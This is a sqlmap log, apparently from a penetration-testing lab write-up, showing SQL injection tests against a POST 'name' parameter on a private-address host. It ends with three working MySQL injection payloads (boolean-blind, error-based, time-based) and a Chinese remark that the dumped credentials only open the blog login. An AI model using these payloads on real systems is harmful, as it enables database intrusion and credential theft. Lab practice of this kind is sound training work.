[15:17:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                                                              
[15:17:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                                                                     
[15:17:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:17:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'                                                                             
[15:17:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:17:07] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                                                             
[15:17:07] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:17:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                                                                   
[15:17:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                                                                    
[15:17:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                            
[15:17:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                             
[15:17:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                                                               
[15:17:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                                                                
[15:17:07] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                                                                   
[15:17:07] [INFO] POST parameter 'name' is 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable                                                       
[15:17:07] [INFO] testing 'MySQL inline queries'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:17:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:17:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:17:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:17:17] [INFO] POST parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                                                           
[15:17:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:17:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:17:17] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:17:17] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:17:17] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:17:18] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 396 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=1' RLIKE (SELECT (CASE WHEN (3453=3453) THEN 1 ELSE 0x28 END))-- fkrZ&email=&phone=&org=

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: name=1' AND ROW(9202,7421)>(SELECT COUNT(*),CONCAT(0x716b766271,(SELECT (ELT(9202=9202,1))),0x7171627a71,FLOOR(RAND(0)*2))x FROM (SELECT 5809 UNION SELECT 6254 UNION SELECT 2907 UNION SELECT 3295)a GROUP BY x)-- lorR&email=&phone=&org=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=1' AND (SELECT 6598 FROM (SELECT(SLEEP(5)))WnCm)-- cXmx&email=&phone=&org=
---
[15:17:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 6 or 8 or 7 (Moonshine or Zod or Werewolf)
web application technology: Apache 2.2.6, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[15:17:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.139'                                                                                     

[*] ending @ 15:17:23 /2023-04-27/

可惜获得的凭证只能用于登录blog页面，并不能登录后台以及ssh连接，价值不大。